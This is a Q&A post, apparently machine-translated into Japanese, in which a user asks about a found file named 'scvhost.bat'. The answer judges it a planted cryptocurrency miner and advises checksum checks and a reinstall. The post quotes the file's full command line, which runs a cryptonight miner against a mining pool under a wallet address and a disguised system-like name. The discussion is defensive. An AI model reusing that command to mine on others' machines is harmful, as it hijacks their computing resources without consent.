cryptonightを含むこのscvhost.batはウイルスですか?それとも鉱夫ですか?
Scvhost.batという名前のこの.batファイルを見つけました。ファイルの内容は次のとおりです。
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
これはウイルス(情報などを盗むため)または植えられた鉱山労働者ですか?暗号通貨にも手を出しており、stratumは上記のファイルに記載されている通貨なので心配です。
特にパラメーターにはマイニングプールへのURLが含まれているため、これはある種のマイナーのように見えます。ただし、バイナリの内容を確認する必要があります。システムで見つけたバイナリのチェックサムを、鉱山労働者の開発チームが作成したリリースと比較することは理にかなっています。それらが異なる場合;システムが安全でないと考えてください。
別の問題は、このマイナーについて(おそらくそれが大量のCPUを使用していたために)判明したことですが、システムで他に何が起こったかがわかりません。侵入者が鉱山労働者を発射できれば、彼らは他の物も同様に発射できたでしょう。いずれにしても、バックアップから回復するか、新規インストールを実行することをお勧めします。